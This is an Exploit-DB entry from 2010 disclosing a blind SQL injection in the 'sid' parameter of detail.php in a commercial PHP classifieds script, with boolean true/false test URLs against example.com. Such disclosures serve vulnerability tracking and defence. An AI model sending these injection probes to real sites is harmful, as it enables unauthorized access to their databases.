PHP Classifieds ADS - 'sid' Blind SQL Injection

EDB-ID:

14891


Author:

h4ck3r

Type:

webapps


Platform:

PHP

Date:

2010-09-04


[~] Title:    PHP CLASSIFIEDS ADS
[~] Price:   $49
[~] Link :   http://www.sellatsite.com/sellatsite/phpclass.asp
[~] Author:    BorN To K!LL - h4ck3r
[~] 3xploit:

/detail.php?sid=[Blind-Injection]

[~] 3xample:

http://www.example.com/classi/detail.php?sid=80 and 1=1--             // True ,,

http://www.example.com/classi/detail.php?sid=80 and 1=2--            // False ,,

[~] Greetings:

string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends");